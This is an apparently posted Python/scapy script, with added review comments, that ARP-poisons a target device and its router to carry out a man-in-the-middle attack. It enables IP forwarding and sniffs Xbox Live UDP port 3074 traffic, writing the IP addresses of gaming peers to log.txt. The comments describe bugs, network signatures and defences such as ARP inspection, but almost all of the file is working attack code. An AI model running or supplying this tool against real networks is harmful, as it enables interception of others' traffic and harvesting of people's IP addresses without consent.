K-Metal

Cain and Abel ARP Poisoning Tool

Sep 25th, 2015
  1. #ONLY WORKS ON LINUX!!!
  2. #Cain and Abel ARP Poisoning for Linux
  3. #Can be used to perform MITM with right data filtering
  4. #Basic ARP Poisoning/Spoofing
  5.  
  6. #By K-Metal
  7. from scapy.all import *
  8. import time
  9. import socket, sys
  10. from struct import *
  11. import threading
  12. from subprocess import Popen, PIPE
  13. import os
  14.  
  #Restore ARP
  def Restore(vm, rm, vi ,ri):
      """Turn IP forwarding off, re-announce the real ARP mappings, then exit.

      vm, rm -- MAC addresses of the device and of the router.
      vi, ri -- IP addresses of the device and of the router.

      Does not return: the last statement calls sys.exit(), which raises
      SystemExit.  An ``except KeyboardInterrupt`` handler does not catch
      that, so a ``break`` written after a Restore() call is never reached.
      """

      # Disable IP forwarding to return to normal.
      # Writes '0' unconditionally; the value that was in place before the
      # script started is never read, so a host that was forwarding on
      # purpose is left with forwarding off.  Writing under /proc/sys needs root.
      with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipz:
              ipz.write('0\n')

      # Reset ARP with router and device: three ARP replies (op=2) in each
      # direction, this time carrying the true owner's MAC as hwsrc.  The
      # hwdst field of the ARP payload is set to the broadcast address.
      # On the wire this is the second half of the "IP changes MAC, then
      # changes back" sequence that ARP-monitoring tools report.
      send(ARP(op=2, pdst=ri, psrc=vi, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=vm),verbose=0,count=3)
      send(ARP(op=2, pdst=vi, psrc=ri, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=rm),verbose=0,count=3)

      # Quit program (raises SystemExit with this message).
      sys.exit("\nchose to stop")
  28.  
  #Get Device Mac address
  def GetMac(host):
      """Return the MAC address the local ARP cache holds for *host*.

      Runs ``arp -n host`` and scrapes its text output.  The command is passed
      as an argument list, so *host* is not interpreted by a shell.

      Raises IndexError when the output contains no "ether" token.
      NOTE(review): presumably that is the case when the cache has no entry
      for the host -- confirm against the arp output on the target system.
      """
      pid = Popen(["arp", "-n", host], stdout=PIPE)
      s = pid.communicate()[0]
      # Remove every space: split on " " and glue the pieces back together.
      # Newlines and other whitespace stay in the string.
      a = s.split(" ")
      b = ""
      for line in a:
          b += line
      # Echo the space-stripped arp output to the terminal.
      print str(b)
      # Keep whatever sits between the literal "ether" and the literal "eth0".
      # The interface name is hard-coded: if "eth0" does not occur, split()
      # returns the whole remainder of the output instead of just the MAC.
      MacAddr1 = (b.split("ether")[1]).split('eth0')[0]
      Addr = ""
      # Drop every upper-case "C" character.
      # NOTE(review): looks like this is meant to strip the flags column of
      # the arp output; it would also eat an upper-case hex digit C -- confirm.
      for liner in MacAddr1:
          if liner == "C":
              pass
          else:
              Addr += liner
      return str(Addr)
  46.  
  # Main Thread
  def ARP_Poison():
      """Prompt for two IPs, then send forged ARP replies to both every 2 s.

      Reads the device IP and the router IP from stdin, looks up both MAC
      addresses with GetMac(), enables kernel IPv4 forwarding and loops until
      Ctrl-C, at which point Restore() is called (and exits the process).

      What this looks like from the network side:
        * unsolicited ARP replies (op=2) arriving at a fixed ~2 second cadence;
        * one sender answering for both the router's IP and the device's IP;
        * the ARP caches of both hosts mapping the peer's IP to the same MAC.
      Switch-level ARP inspection, static ARP entries for the gateway and
      ARP-cache monitoring are the controls aimed at this pattern.
      """
      vip = raw_input("Enter device ip: ")
      rip = raw_input("Enter router ip: ")

      # Personal settings for the author's setup: typing "xbox" instead of an
      # IP selects a hard-coded MAC/IP pair and skips the ARP-cache lookup.
      if vip == "xbox":
          vmac = "00:25:ae:18:99:de"
          vip = "10.0.0.3"
      else:
          vmac = GetMac(vip)
      rmac = GetMac(rip)

      # Enable IP forwarding so the redirected traffic is relayed rather than
      # dropped.  The previous value is not saved; Restore() always writes 0.
      with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
              ipf.write('1\n')

      # ARP Spoof: two ARP replies per round.
      #   1st: to the device (vi/vm), with the router's IP as sender IP.
      #   2nd: to the router (ri/rm), with the device's IP as sender IP.
      # No hwsrc is given, so scapy supplies the sending interface's own MAC
      # as the sender hardware address.
      def poison(vm, rm, vi, ri):
          send(ARP(op=2, pdst=vi, psrc=ri, hwdst=vm),verbose=0)
          send(ARP(op=2, pdst=ri, psrc=vi, hwdst=rm),verbose=0)

      print "Poisoning"

      # Keep spoofing or stop.  The three KeyboardInterrupt handlers all do
      # the same thing; they only differ in where Ctrl-C happened to land
      # (during the send, during the sleep, or in between).  Restore() ends
      # in sys.exit(), so the `break` after each call is not reached.
      while True:
          try:
              try:
                  poison(vmac,rmac,vip,rip)
              except KeyboardInterrupt:
                  Restore(vmac,rmac,vip,rip)
                  break
              try:
                  # Fixed 2-second interval between rounds.
                  time.sleep(2)
              except KeyboardInterrupt:
                  Restore(vmac,rmac,vip,rip)
                  break

          except KeyboardInterrupt:
              Restore(vmac,rmac,vip,rip)
              break
  88.  
  #Personal Setting to listen for xbox IP's
  def Listener():
      """Sniff UDP port 3074 forever and log the peer IPs seen to log.txt.

      Captures one packet per sniff() call and hands it to Parse(), which
      adds the packet's source and destination address to ip_list (subject to
      a substring filter) and rewrites log.txt in the current working
      directory.  Never returns.

      Artifact left on the host: a file named log.txt holding one IPv4
      address per line, rewritten on every captured packet.
      """
      # Unused: Parse() assigns its own local `msg`, this one is never read.
      msg = ""
      ip_list = []

      # Parse the packet to save IPs to file.
      def Parse(packet):
          try:
              # src/dst of the second layer of the captured packet
              # (presumably the IP layer under the Ethernet header -- confirm).
              ip1 = str(packet[0][1].src)
              ip2 = str(packet[0][1].dst)
              if ip1 not in ip_list:
                  try:
                      # Filter for needless IP's, you can add more if needed.
                      # Apart from the two exact comparisons these are
                      # substring tests, not prefix or subnet tests: "255" and
                      # "65.5" also match in the middle of an address (for
                      # example "65.5" is contained in "165.5.1.1").
                      # Addresses containing ":" are skipped entirely.
                      if ":" not in ip1:
                          if ip1 == "0.0.0.0":
                              pass
                          elif "255" in ip1:
                              pass
                          elif "10.0.0." in ip1:
                              pass
                          elif ip1 == "224.0.0.252":
                              pass
                          elif "65.5" in ip1:
                              pass
                          elif "184.29.104" in ip1:
                              pass
                          elif "75.75" in ip1:
                              pass
                          elif "127.0" in ip1:
                              pass
                          else:
                              ip_list.append(ip1)
                  except:
                      pass
              # Same filter, repeated verbatim for the destination address.
              if ip2 not in ip_list:
                  try:
                      if ":" not in ip2:
                          if ip2 == "0.0.0.0":
                              pass
                          elif "255" in ip2:
                              pass
                          elif "10.0.0." in ip2:
                              pass
                          elif ip2 == "224.0.0.252":
                              pass
                          elif "65.5" in ip2:
                              pass
                          elif "184.29.104" in ip2:
                              pass
                          elif "75.75" in ip2:
                              pass
                          elif "127.0" in ip2:
                              pass
                          else:
                              ip_list.append(ip2)
                  except:
                      pass
              # Rebuild the whole log text from ip_list on every packet.
              msg = ""
              for addr in ip_list:
                  msg += addr +"\n"

              # Save to log file.  Opened with "w", so the file is truncated
              # and rewritten each time, whether or not ip_list changed.
              print "Saved to log.txt"
              newfile = open("log.txt","w")
              newfile.write(msg)
              newfile.close()
          except:
              # Bare except: every error in the handler (including a failed
              # write) is silently discarded.
              pass
      while True:
          # You can change the protocol and port to sniff on.
          # count=1 makes sniff() return after a single matching packet, so
          # the capture is set up again on every loop iteration; the return
          # value bound to `device` is not used.
          device = sniff(filter="udp and port 3074",prn=Parse,count=1)
  160.  
  # Start the listening thread and the ARP spoofing loop.
  # These statements sit at module level with no __main__ guard, so they run
  # as soon as the file is executed or imported.
  t = threading.Thread(target=Listener)
  # Daemon thread: it does not keep the process alive, so the sniffer stops
  # when the main thread exits (Restore() calls sys.exit() on Ctrl-C).
  t.daemon = True
  t.start()
  # Runs in the main thread and blocks until interrupted.
  ARP_Poison()